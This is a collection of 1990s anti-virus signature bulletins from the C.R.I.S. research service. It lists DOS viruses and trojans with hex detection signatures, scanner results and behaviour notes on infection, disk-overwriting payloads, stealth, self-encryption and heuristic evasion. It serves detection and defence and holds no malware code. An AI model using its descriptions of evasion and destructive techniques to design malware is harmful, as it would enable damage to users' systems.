This virus came out of the +Crypt Newsletter #20 (CRPTLT20.ZIP) + +Michael Paris + +- ---------------------------------------------------------------------------- +Virus Name: Blood Sugar + Notes: COM EXE INF + Signature: 5E 81 C6 1E 00 89 F3 81 EB 23 00 8A 27 8A + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.09 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +Blood Sugar is a non-resident .COM infector that infects all .COM files +in the current directory when an infected file is run. Infected files +will grow 416 bytes in size, and no change in file to date or time stamp. + +Michael Paris + +- ---------------------------------------------------------------------------- +Virus Name: Dementia Pracecox 1.0 + Notes: COM EXE INF + Signature: 5D 81 ED 12 01 8B F5 81 C6 38 01 8B DD 81 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.09 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +Dementia is a non-resident infector of .COM files that will change +infected files 512 bytes. Dementai will also infect all .COM files +in the current directory with no date or time changes made to +infected files. This virus was written by "Mnemonix". + +Michael Paris + +- ---------------------------------------------------------------------------- +Virus Name: Atomic 1.0 + Notes: EXE COM INF + Signature: B8 ED FE CD 21 A3 03 01 0E 8F 06 6F 01 BA + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.09 : probably infected by an unknown virus + SCAN V109 : No viruses found. + +If you add the above signature to your scanner, it will be detected. + +ATOMIC is a memory resident virus that spawns .COM files for .EXE files +in your directorys. 
After the virus is resident in your system memory it +will wait for you to run .EXE files. When a EXE file is run it will make +a matching .COM file with the same name. This will be a hidden file on +your disk. Spawned files will be 425 bytes in size until the file is run +on the 14th of any month when it will change in size to 456 bytes. The +increase in size comes from the virus adding a text string to any spawn +.COM file that is run on the 14th. Three spawn files will have the text +"Atomix v1.00 by Mnemonix." added to them if one file is run on that date. +The .COM spawn files will always result in the file date of creation or +infection. + +Michael Paris +- ---------------------------------------------------------------------------- + +For Complete Up Dated Sigfiles for TBAV or SCAN +Freq Magic Names CRISTBAV or CRISMCAF from 1:115/863 + + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLTCwy6M4CDusTF+9AQFF+wIAoZUGMzIs+C52mO11hF74qrtZ4As44HUp +pNaePO1Z0cXEO5+h9PrFGB8NL1tbrXVgdG79YAPP4RlMTDM/oSTozA== +=PzOM +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +C.R.I.S New Virus Signature Warning! CrisInfo #010 + +- ------------------------------------------------------------------------- +Virus Name: [CrisSig] CARPE + Notes: COM EXE INF + Signature: 8B F4 36 8B 2C 81 ED 03 01 44 44 8B C5 05 + + If you add the above signature to your scanner, it will be detected. + + F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : No viruses found. + SCAN V111 : No viruses found. +ShareScan 5.0 : No viruses found. + +Thunderbytes heuristics are able to detect the dropper of this virus +but as soon as a file is infected, the virus encrypts itself and is +able to sneak pass Thunderbytes heuristics. + +CARPE DIEM! - Sieze the day originated from Sweden and was written by +Raver. Its a .COM infector and searches the directory tree downwards +using the dot-dot method. 
It checks the system time for one hundredth +of a second and if it matches, then it does an absolute write to the +first sector of the hard disk (boot sector of drive C:). There is about +a 5% chance of this happening and if it does, the following message will +also be displayed: + + CARPE DIEM! (c) '93 - Raver/Immortal Riot + +It also checks the current drive to see whether its drive A: or B: and +if so, it does not infect any files to avoid suspicion. +Infected files increase by 469 bytes and two clean .COM files are +infected every time the virus is run (unless the current drive is A: or B:) + +Carpe - This is a direct action virus. It will infect .Com files to +include Command.com. Files will show an increase of 472 bytes. It +checks the clock for hundredths of a second. If it is below 5, it +will overwrite the first sector of the HD with the virus code making +it unbootable and unrecognizable to the system. You will know when +this happens as a message will appear on the screen pronouncing the +presence of the virus. Infected files will continue to run. It also +uses the .. method to step backwards when no more files are available +in the current directory to infect. This virus originated in Sweden. + +- - Ashley Kleynhans - Bill Dirks [Cris] +- ------------------------------------------------------------------------- + +Virus Name: Human Greed + Notes: EXE COM OVW + Signature: BE 30 01 8B 16 17 01 B9 35 01 2E 31 14 83 + + F-Prot 2.11 : Possibly a new variant of Trivial. + TBAV 6.10 : Infected by V2pX virus. + SCAN V111 : No viruses found. +ShareScan 5.0 : No viruses found. + +This is a mutation of the Infernal Demand virus written by Metal Militia. +It originated in Sweden and the author is The Unforgiven. +Its an overwriting virus that overwrites the first 666 bytes of EXE and +COM files. It checks the current drive and if it does not match with C:, +the virus automatically switches to C: drive if a C: drive exists so that +it can still do its damage. 
If an infected file is executed, there is a +50% chance of the message "Program too big to fit in memory" being +displayed (this is of course, a fake message which the virus displays). +If this happens, a random number is generated and if its less than 10, it +will proceed to overwrite the first couple of sectors on the C: drive, +this means that in total, you have a 5% chance of your C: drive being +overwritten every time the virus is run. It uses the dot dot method of +changing directory downwards once all files in the current directory are +overwritten. The virus does not infect floppies. + +H-Greed - This is a direct overwriting infector of Command.com and +all .EXE's. It renders infected programs useless since it overwrites. +It appears to do nothing other then replicate. However, if an infected +file is run and the clock shows a time with the hundredths less than 5, +it will overwrite the first 255 sectors of the HD. It uses the .. +method to step backwards when no more files are available in the +current directory to infect. This virus originated in Sweden. +- - Ashley Kleynhans - Bill Dirks [Cris] +- ------------------------------------------------------------------------- + +Virus Name: DOOM! + Notes: COM EXE INF + Signature: 8B FC 36 8B 2D 81 ED 03 01 44 44 1E 06 0E + +If you add the above signature to your scanner, it will be detected. + + F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : Probably infected by an unknown virus. + SCAN V111 : No viruses found. +ShareScan 5.0 : No viruses found. + +Thunderbytes heuristics detect the dropper of this virus, but fail to +detect the actual encrypted virus even when the heuristic parameter is +specified. + +DOOM! - originated from Sweden and was written by Raver. 
+ +Its an .EXE infector and searches the directory tree downwards using the +dot-dot method, it does not stop travelling down the directory tree until +it has reached the root directory and infected all the .EXE files in the +root directory. It also chews up 3K of memory every time an infected file +is executed, there is a bug in this routine which causes the system to +freeze up when COMMAND.COM is called. Otherwise, this is a harmless virus. + +Ashley Kleynhans [CRiS] +- ------------------------------------------------------------------------- + +Virus Name: ETERNITY! + Notes: COM EXE INF + Signature: 5D 83 ED 03 E8 15 00 EB 27 90 E8 0F 00 B4 + +If you add the above signature to your scanner, it will be detected. + + F-Prot 2.11 : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : No viruses found. + SCAN V111 : No viruses found. +ShareScan 5.0 : No viruses found. + +This virus originated from Sweden and was written by The Unforgiven. + +Thunderbytes heuristics will detect the dropper of the virus but as +soon as the virus appends itself to an .EXE file, it encrypts itself +and Thunderbyte is then unable to detect any infected files. + +Its a mutation of Tormentor's .EXE lession (so the author says). +It infects 3 .EXE files every time an infected file is executed and +uses the dot-dot method of travelling down the directory tree. +The size of infected files is increased by 562 bytes. + +Ashley Kleynhans [CRiS] +- ------------------------------------------------------------------------- + +[CrisSig] Geodesic Propagation 2.0 +EXE COM LOW INF +1E 06 0E 0E 1F 07 2E FE 06 ?2 2E A1 + + F-Prot 2.11 : Possibly a new variant of Nympho + TBAV 6.10 : No viruses found. + SCAN V111 : No viruses found. + +Geodesic is A memory resident COM and EXE infector that will add 666 bytes +to infected files. There is no time or date changes, and files are infected +when they are run and the virus is resident in memory. 
+This virus was written by Cerebral Quantas [Phalcon/Skism] + +Michael Paris [Cris] +- ------------------------------------------------------------------------- + +Virus Name: OLO or OLO_II + Notes: EXE COM INF + Signature: 5D 81 ED 03 01 EB 1B 90 B8 24 35 CD 21 + + F-Prot 2.11 : New or modified variant of PS-MPC. + TBAV 6.10 : probably infected by an unknown virus. + SCAN V111 : Found virus -- Ancients [Anc] + +If you add the above signature to your scanner, it will be detected. + +OLO is a nonresident com infector. It will infect only the first com +file in the directory. When the file is first executed it will scroll across +the screen with the message "Ancient Sages Is on of the pAgEs". When this is +scrolling pressing Ctrl-Break will cause the scrolling to stop and the system +will make a sound almost like laughing. It will cause an infected file to +increase in size by 783 bytes. This virus will not check for previous +infection, so it therefore capable of reinfecing the same file over and over. +It appears to contain no intentionally damaging code. The following messages +are visible within the virus code: +"by -->>pAgE<<--(c) 1992 TuRN-THE-pAgE Ancient Sages Is one of the pAgEs" +"*.COM" + +OLO_II is also a nonresident com infector. It will also infect the first com +file in the directory. When the file is first executed it will scroll across +the screen with the message "Video Port XMS/EMS 1993". When the system is +scrolling pressing Ctrl-Break will cause the scrolling to stop and the system +will make a sound almost like laughing. It will cause infected files to +increase in size by 841 bytes. This virus will not check for previous +infection, so it is therefore capable of reinfecting the same file over and +over. It also appears to have a code problem. When a COM file is infected +the jump at the beginning of the COM file jumps to an INT 20 and ends +execution of both the COM file and the virus. 
+The following messages are visible within the virus code: +"byMicrosoft(c)MSD Memory Manager Beta Video Port XMS/EMS 1993" +"*.com" + +William Chapman (CRiS) +- ------------------------------------------------------------------------- + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLWV8BaM4CDusTF+9AQGgNgIAicVaTh+FnwkW9bBLJybCZXAGS46wyvc8 +1pyseIKnxQ9zPcWPZobZ8cd9dxsTIWbq0pgQPZfS/ULMvSF/i7NUDA== +=qY9e +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +Virus Signature Alert! + +Virus Name: [BENOIT] ICE-9 ARCV Variant + Notes: EXE COM INF LOW + Signature: 5E81EE06008D841F00508DBC1F00 + +Virus Name: [BENOIT] ICE-9 ARCV Variant Dropper + Notes: EXE COM INF + Signature: 33C0BB0001BE0001899CB2028984 + +[X] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 108 + +This virus is memory resident. No date or time changes take +place on infection. This virus comes from England and is a variant +of the ARCV virus. It was made November 5th 1992 and was Dedicated +to Benot B. Mandelbrot where the virus recieved it's name. F-prot +reports "Variant of ARCV" but no other scanner catches it in any way +yet. It is A .EXE infector though it can be found in .COM files as A +Dropper Program. This virus and its dropper can be detected with the +above signature added to your scanner. + +Virus Name: McAfee's Whale (MCWHALE) + Notes: COM EXE INF + Signature: BB2A02BE18002E81?346464B + +Virus Name: McAfee's Whale Dropper + Notes: COM EXE INF + Signature: BE000189F7C7041492C64402C756 + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 108 + +Both this virus and the drop program are not detected in any scanner I +have tried. This virus is not the stealth virus we are used to seeing. +This is A .EXE infector that adds 1125 bytes to infected files with no +date or time changes. When the infected file is run, A message moves +across the screen (from right to left) saying "BEWHERE!!! Anti-virus Man +John McAfee ... The WHALE Virus .... HONEST!!! .... 
+With the above signature added to scanner for the MCWHALE and the Dropper, +This virus is detectable. + + +Virus Name: [Chromosome Glitch] v3.0 Memory Lapse + Notes: COM EXE INF LOW + Signature: 5D81ED03011E06B8EFDDCD2181FB + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 108 + +This Virus Chromosome Glitch 3.0, Written by Memory Lapse in Toronto, ON. +is A memory resident .COM infector, adding 385 bytes to infected files. +Files are infected by running them after the virus becomes memory resident. +There are no date or time changes to the file. The virus will infect +command.com if the virus is already resident. No Scanners that were tested +detected this virus until the above signature was added. Memory Lapse is +a programmer in Canada that has written many viruses showing up here in the +USA. Most of them improving in the are of detection by AV scanners. The +latest that we have researched here were the Chromosome Glitch 1.0, 2.0, +Golgi Testicles] v1.0, 2.0, 3.0, Nympho Mitosis v1.0, 2.0, and the Famous +'Memory Lapse' Virus that is Un-Removeable from Nite Owls CD-ROM shareware +disk sent to many BBS's. This Virus Chromosome Glitch virus is detectable +by adding the above signature to your scanner. + + +Virus Name: Murphy (Goblin) Dropper + Notes: EXE COM INF LOW + Signature: BE26018BFE8B0E08018B160201B8 + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 108 + +All of the above scanners detect the virus above. BUT NOT the dropper for +the virus. Murphy's Goblin is A memory resident .EXE infector that does not +change dates or times on the files it infects. Some scanners scan the files +as 'Black Death'. The dropper for this virus is detectable by adding the +above signature to your scanner. 
+ + +Virus Name: Blood Rage Virus + Notes: EXE COM INF + Signature: 5D81ED0301B844008EC0BF00018B + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [x] SCAN 108 + +The Blood Rage Virus is seen in heuristic mode in TBAV and F-PROT, the +signature above will report the 'Blood Rage' Virus in both of these if you +add the string to your scanner. McAfee's Scan reports the correct virus. Tbav +and F-prot report 'Probbly infected with a unknown virus'. Blood Rage will +infect .Com files when A infected file is run. The text below can be seen in +the virus code. + +THE WORLD WiLL NEVER FORGETT US! -Beta Boys- Blood Rage (c)1992 The BetaBoys + + +Virus Name: Demo-Exe Virus Admiral Bailey [YAM] + Notes: EXE COM INF + Signature: 5D81ED03011E060E0E1F078DB653 + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 108 + +Little is known about this virus. None of the scanners tested detected +this virus. With the above signature added to your scanner it will be +detected as the Demo-Exe Virus. This is the name given to it in the +virus code. (Demo-Exe Virus Admiral Bailey [YAM]). This is A .EXE infector +adding 334 bytes to each infected file. It will infect three .EXE files +each time an infected file is run. YAM is a virus writing group that +is (was) headed by 'Admiral Baily' Y ouths A gainst M cAfee. It seems that +Admiral Baily has left the virus world for a while and has not been heard +from (according to sources). + + +Virus Name: Handy Virus + Notes: COM EXE SYS INF + Signature: 8CC00500108EC0BE0001BF0000B9 + +[ ] F-Prot 2.09f [x] TBAV 6.08 [ ] SCAN 108 + +Little is known about this virus. TBAV reports unknown virus, no other +scanner can see this file. According to the code this is a .Com infector. +Tested here it seems to also infect Dos System Files. MSDOS.SYS, IBMDOS.SYS +attrib -s -h -r files. After your DOS system is infected, things will never +be the same. Error messages will come up with most every command. 'Divide +Overflow', 'System Halted', Etc... 
Lockups will become common with flashing +lights and error messages. By adding the above string to your scanner you +can detect this file before you have to experience all of this 'fun'. + +These signature's come from Cris +Computer Research & Information Service +(708) 863-5285 + +* these signature's have passed all testing and worked on all + files that were infected and tested. + + +This virus signature can be added to F-Protect by running f-prot.exe +then use the menu to add the code below. After you add the code, be +sure to scan using the /USER switch. f-prot /user {enter} + +REMEMBER F-prot will only allow 10 user sigs at a time, TBAV will allow +Over 1000. + +You can also add it to TBAV by running tbgensig.exe make a text file +called usersig.dat, then make it look like below. +; +virus name +your notes here +skdjfjdh34585855 {string goes there +; +virus name +your notes here +skdjfjdh34585855 {string goes there +; +run tbgensig.exe + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLOirAqM4CDusTF+9AQHGLQH/bQ4DZ48yzFu+KjEqyogWYtjO16RNbgD3 +GuLtq8uGdsrDDim3HpqbvuCXk1RUa1ZFpV7EcNNIIQx0wN7wEEOWUQ== +=3xAZ +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + +Virus Signature Alert! + +Virus Name: Iron Maiden (August 16th) + Notes: COM EXE DROP + Signature: 8CC6060B01C3EBF8B8D9C8D9BADF + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 9.20 V109 + +None of the above scanners see this dropper. After this dropper +infects either itself or another file it will be scannable by the +above scanners. Add the signature above and you will not have to +go through the pains of having to mess with this whole thing. + +Iron Maiden will infect two files in the current directory and +then go to drive C: to infect the first two files in the root +directory. If you are running A infected file from the A: and +do not have a hard disk, your machine will lock. 
If there is a +hard disk the virus will infect two files in the root dir of +your C: and let the infected file continue running. + +This Virus adds 636 Bytes to infected files, and does not change the +date or time. + +Virus Name: [Binary Fission] v1.0 [ML/PS] + Notes: EXE COM LOW INF + Signature: BD?2B83D3DCD21353E3DBB4D5A + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 9.20 V109 + +None of the above scanners see this virus. Binary Fission 1.0 is +a memory resident EXE & COM infector written by Memory Lapse from a +virus writing group called Phalcon/Skism. + +When a file infected with this virus is run, the virus will go memory +resident and infect any .Com or .Exe file that is opened, executed or +has any attributes changed. Files will increase 517 bytes in size. +This virus will not infect command.com even after it becomes resident, +command.com is executed. There are no time or date changes. + + +Virus Name: Phasor (1.0) + Notes: COM EXE LOW INF + Signature: BD?233FF8EC7BFE00126803DBD + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 9.20 V109 + + +The Phasor (1.0) Virus remains resident in memory in unused portion +of Interrupt Table Starting At Offset 1E0h. When this virus goes +resident it will infect any .Com file that is run adding 230 bytes to +the infected file. There are no time or date changes on infected files. + +Phasor (1.0) was written by Memory Lapse in in Toronto, ON. Canada, and +is not seen by any of the scanners above. If you add the signature above +to your scanner this virus will be detected. + +These signature's come from Cris +Computer Research & Information Service +(708) 863-5285 + +* These signature's have passed all testing and worked on all + files that were infected and tested. + +* Note: If you are using another scanner other then TBAV you may need + to change the signature. For other scanners replace ?# with the + number after ?. ?2 you would change to ????, or ?3 you would change + to ??????, and so on. 
Replace the ?# with double the ?'s as the number. + +This virus signature can be added to F-Protect by running f-prot.exe +then use the menu to add the code below. After you add the code, be +sure to scan using the /USER switch. f-prot /user {enter} + +REMEMBER F-prot will only allow 10 user sigs at a time, TBAV will allow +Over 1000. + +You can also add it to TBAV by running tbgensig.exe make a text file +called usersig.dat, then make it look like below. +; +virus name +your notes here +skdjfjdh34585855 {string goes there +; +virus name +your notes here +skdjfjdh34585855 {string goes there +; +run tbgensig.exe + + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLO33SqM4CDusTF+9AQFP5AH8CkZKqnFhl2Ae64cUk5sxezLfmEuf6+oo +S/uAEb3rJboQlXlWCCPfEXsHXNqPG7SDwzt4fBnDGrK85hIjgThRxg== +=AWHS +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + +Virus Signature Alert! + +- --------------------------------------------------------------------------- +Virus Name: 1984 (TaLoN) + Notes: COM EXE LOW INF +Signatures: TBAV - 33 C0 8E D8 BE ?2 FF 34 FF 74 02 C7 04 + F-Prot - 33 C0 8E D8 BE ?? ?? FF 34 FF 74 02 C7 04 + Scan - 33 C0 8E D8 BE ?? FF 34 FF 74 02 C7 04 + +[ ] F-Prot 2.10 [M] TBAV 6.08 [ ] SCAN 9.20 V109 + +None of the above scanners detect this Virus as of yet. +If you add the above signatures to your scanner, it will be detected. + +1984 from TaLoN ... probably the world's sneakiest virus to date. +TBAV tags it in "high heuristic" mode ... NOTHING else finds it. + +This virus got a write-up in the latest PC Week ... it's being spread in a hack +of SCANV109. You only need to run the hacked SCAN once and you're history ... +it hits every susceptible file on your HD in just one pass! + +It can hit COM/EXE/BIN/OVL/SYS files, the MBR, and 360kB floppy boot sectors. + +It has directory/file/partition stealth. + +Infected files are forward-dated by 100 years. 
+ +By: Rod Fewster +- ---------------------------------------------------------------------------- + +Note: In our tests we find it infecting all of the above, though we did not run +the tests on the the MBR, and 360kB floppy boot sectors yet. This virus is +tricky with the stealth technology it uses. It will disinfect on the fly, so +one minute one file will be infected and the next it will not but another will +be. File size changes are not present while the virus is memory resident, but +if you look when the virus is out of memory you will see a 1979 byte change on +infected files. When the virus first goes memory resident it will look for and +demand C:\DOS\COMMAND.COM and infect this file, though it may disinfect it +latter and infect the command.com file in the root directory of the disk. + +The signature above worked on all samples of infected files tested here. This +virus is not done being researched, but the signature is here so that you can +stop something that may have started in your computer already. + +Michael Paris (Cris) +- -------------------------------------------------------------------------- + +Virus Name: Firefly Virus + Notes: COM EXE LOW INF +Signatures: TBAV - BB ?2 B9 10 01 81 37 ?2 81 77 02 ?2 83 C3 04 E2 F2 + F-Prot - BB ?? ?? B9 10 01 81 37 ?? ?? 81 77 02 ?? ?? 83 C3 04 E2 F2 + Scan - BB ?? B9 10 01 81 37 ?? 81 77 02 ?? 83 C3 04 E2 F2 + +[ ] F-Prot 2.10 [ ] TBAV 6.08 [ ] SCAN 9.20 V109 + +None of the above scanners can detect this virus. If you add the above +signatures to your scanner it will be detected. + +The FIREFLY virus is a memory resident COM file infector. It's most +noticeable feature is the ever-changing keyboard LED's that appears when +the virus is resident in memory. + +Upon execution the virus allocates approximately 4k of memory and hooks +interrupts 21h, 1Ch, and 24h. The old DOS interrupt 21h is moved to +interrupts 1h and 3h to be used in the virus to handle replication. 
+ +Interrupt 21 +============ +If this interrupt is called, the virus checks to see if an open, execute, +or attribute call is being made. If not, the registers are restored and +the old int 21h is called and everything appears as normal. If one of +these functions are being performed, the virus checks to see if it is +a COM file that is being looked at. If it is, the virus infects the +file. The virus also checks the filename passed to the interrupt to see +if an anti-virus program is being accessed. If it is, the virus deletes +the executable. + +Interrupt 1Ch (System Timer Tick) +================================= +When this interrupt is hooked, the light show begins! The virus keeps +track of how many clock ticks have passed. When the count reaches a +certain point, the virus changes which keyboard LED's are lit. This +continues as long as the virus is memory resident. The virus also makes +your typing rather difficult since it constantly shifts between upper +and lower case. + +Encryption +========== +The virus encrypts itself by using the XOR function with two randomly +generated word variables, alternating between the two variables. + +Infection +========= +The first three bytes of the original COM file are stored within the virus +and replaced by a jump instruction that points to the beginning of the +virus code. Viral code is appended to the end of the COM file. The +COM files grow by 1106 bytes once infected and will appear to function +normally. The virus will not re-infect infected executables and it is +smart enough to know whether or not it is already resident. 
+ +DuWayne Bonkoski (Cris) +- ---------------------------------------------------------------------------- + +Virus Name: Adams Family [Men] + Notes: EXE COM LOW INF +Signatures: BB 12 01 FF 27 2A 2E 43 4F 4D 00 2D 3D 41 + +Virus Name: Adams Family [Wendy] + Notes: EXE COM LOW INF +Signatures: BB 12 01 FF 27 2A 2E 43 4F 4D 00 4D 63 41 + +Virus Name: Adams Family [Morticia] + Notes: EXE COM LOW INF +Signatures: BB 12 01 FF 27 2A 2E 43 4F 4D 00 2D 3D 90 + + +[ ] F-Prot 2.10 [ ] TBAV 6.08 [ ] SCAN 9.20 V109 + +None of the above scanners can detect these viruses. If you add the above +signatures to your scanner they will be detected. The signatures above +good for all three AV scanners. + +This is the "Adams Family Collection", Eight viruses total. We were +able to get most of the viruses together into one signature, these are: +Cousin It, Gomez, Lurch, Pugsley, Thing, and Uncle Fester. The other two +Morticia and Wendy have two different Signatures. + +The Adams Family Collection were written by the author of A Variant of the +Butterfly virus 'Crusades'. -DeathBoy KoASP + +These are Resident Com infectors. When a file infected with the Adams virus +is run it will infect other .Com files in the current directory. After the +virus infects a number of .Com files (this is A different number depending +on the virus), it will go memory resident. + +While the virus was in memory i could not get it to infect another file +without running it (though it was resident). When infected files are run +they do replicate. Each file infected will change size depending on which +one is run, Gomez 1648 Bytes, Pugsley 1792 Bytes, Cousin It 1680 Bytes, etc. + +This collection does warrent further research, but this is released so you +can detect this 'weird family' and know a bit about them. 
+ +Michael Paris (Cris) +- --------------------------------------------------------------------------- + +These signature's come from Cris +Computer Research & Information Service +(708) 863-5285 + +* These signature's have passed all testing and worked on all + files that were infected and tested. + +REMEMBER F-prot will only allow 10 user sigs at a time, TBAV will allow +Over 1000. + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLP+AFqM4CDusTF+9AQEHbgH/Rdgwij38YcPbQWlYsFK3en57rD0x0H2d +Cb/jNnRcbjo4NhGmlOiMdhc7l3kv88wIe/Mj0Rx7+f0MkL0VjOHH/w== +=fc7i +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + + +You can freq a complete CRIS TBAV Update signature file from 1:115/863 +with the magic name CRISTBAV + +- - ----------------------------------------------------------------------- +C.R.I.S. New Virus Signature Warning (CrisInfo.009) +- - ----------------------------------------------------------------------- + +Virus Name: [CrisSig] THCK Trojan 2_HERM + Notes: EXE COM TROJ + Signature: BE 03 01 E8 ?2 B2 ?1 E8 ?2*6 FE C2 80 FA 02 + +If you add the above signature to your scanner, it will be detected. + +This file is a simple trojan using the Trojan Horse Construction +Kit (THCK). It seems there are several deliberate bugs in it to create +confusion. It doesn't use Int 13 properly but still accomplishes its +desired task. This is to wipe all possible floppies and hard drives +(The first 128 of each). One of the bugs regards its desired message. +This is variable in length. The desired message is used as the test to +overwrite the first 0-255 sectors of all attached disks. The message is +encrypted. The supplied signature should catch most variants +(cracks/modifications) of this without a complete rewrite of the engine. 
+ +Bill Dirks (C.R.I.S) + +- - ----------------------------------------------------------------------- +Virus Name: [CrisSig] LindaLou + Notes: EXE COM INF + Signature: BA 12 01 8E DA 8C 06 38 00 33 ED E8 E6 0A + +Virus Name: [CrisSig] LindaLou (2) + Notes: EXE COM INF + Signature: BA 75 01 8E DA 8C 06 38 00 33 ED E8 4B 10 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : no viruses found + SCAN V111 : no viruses found + +If you add the above signatures to your scanner, they will be detected. + +Lindalou is written by Jackel from the West Coast (Califorina). Lindalou +is a Spawning virus, if A Lindalou infected file is run it will go through +the hard disk and make .Com files for EXE files over 40K in size. No time +or date changes were noticed. No real payload was noticed either (all though +Jackel is known to add payloads to most of his code. + +Michael Paris + +- - ----------------------------------------------------------------------- +Virus Name: [CrisSig] ANTIPRINT + Notes: COM EXE LOW INF + Signature: 00 5D 81 ED 13 00 06 1E B8 41 4E CD 21 3D 45 4D + +If you add the above signature to your scanner, it will be detected. + +ANTIPRINT - This virus is called AntiPrint for a good reason. +If it finds DOS's PRINT installed, it will invoke a disk overwriting +routine to overwrite the first 16 sectors of drive C:. While I +couldn't get it to run on my system the code looks like it will do +what it's suppose to do. This is a resident infecting program. + +Bill Dirks (C.R.I.S) + +- - ----------------------------------------------------------------------- +Virus Name: [CrisSig] Zeuss + Notes: EXE COM INF + Signature: BE ?2 BA 70 01 2E 81 34 ?2 46 46 4A + +F-Prot Signature: BE ?? ?? BA 70 01 2E 81 34 ?? ?? 46 46 4A + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : might be infected + SCAN V111 : no viruses found + +If you add the above signature to your scanner, it will be detected. 
+ +The Zeuss virus was written by Muja Dib with the help of ARiSToTLE +(so he says in his info). Zeuss is a .COM and .EXE infector that will +add 753 bytes to each infected file. It will infect command.com so files +will be infected with each boot. + +"On the anniversary of ][avoks crash (the 27th of every month) +when an infected file is run, it will wipe out various tracks +of Drive C: and Drive D: and put an Zeuss fact on the screen...)" + +Michael Paris (C.R.I.S) + +- - ----------------------------------------------------------------------- +Virus Name: [CrisSig] Trivial V6 + Notes: EXE COM INF + Signature: BF FD 00 57 B8 F3 A4 AB B0 CC AA BE + +Virus Name: [CrisSig] Trivial V7 + Notes: COM EXE INF + Signature: B9 02 00 0E 1F 5E AD 3D 4D 5A 74 18 3D 5A + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + (V6 says might be trivial) + TBAV 6.10 : no viruses found + SCAN V111 : no viruses found + +If you add the above signature to your scanner, it will be detected. + +V6 & V7 came in as .COM files V7.com and V6.com, Both are Com infectors, +V6 adding only 96 bytes to infected files and V7 416 bytes. These files +do not change time or date stamps on files and they seem to do a good job +of infecting files with one run across the drive. If you add the above +signature to your scanner you can save yourself some restore time if they +happen to make a stop on one of your disks. + +Michael Paris (C.R.I.S) +- - ----------------------------------------------------------------------- + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 
60600-8077 Voice (708) 863-5472 + BBS (708) 863-5285 FAX (708) 484-5702 +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates) +ͼ + + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLVXLfqM4CDusTF+9AQHe2AH+PkXzBgNNBJI7ojT6InWn+tiOEzqYne92 +Vs9OhO5QUn5jwCarMBAY0JzzJDtbouC4KQk3ae7HQtf4wWwTCUb2kw== +=Ta+B +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +C.R.I.S New Virus Signature Warning! CrisInfo #011 + +Because of the possible destructive nature of most of the following, +I ran these on a plain XT w/Dos 5.0 & no Tsrs, etc. to see what they'll +do. It also served the purpose of running about as supseptable a system +as possible. + +This is sort of rushed (72 hours) +and done without gallons of coffee & jolt so here goes. +- ----------------------------------------------------------------------- + +[CrisSig] Aftershock-1 Trojan/Joke +EXE TROJ +BA F9 00 8E DA 8C 06 38 00 33 ED E8 B9 0C + +[CrisSig] Aftershock-2 Trojan/Joke +EXE TROJ +BA B3 01 8E DA 8C 06 4A 00 33 ED E8 2E 0F + +Aftershock 1 & 2 Trojans? - These seem to be jokes. 1 will simply +"act" like it might be doing something but it doesn't do anything +besides display the number 5.2 after acting like its trashing the +hard drive. 2 simply locks the system. While the code looks and +does pick up the Int 13 & 26 code, it does nothing. I ran each of +these about 40+ times with no results of any virus or trojan activity. +This code was written in Pascal. +- ----------------------------------------------------------------------- + +[CrisSig] Earthquake1 Trojan +EXE XHD TROJ +80 00 0A 00 3F 00 12 00 36 04 36 A4 4C 01 00 40 + +[CrisSig] Earthquake2 Trojan +EXE XHD TROJ +F0 00 09 00 2C 00 0D 00 26 04 26 A4 28 01 00 40 + +Earthquake 1 & 2 Trojans - These are just what they claim to be, +simple trojans. 
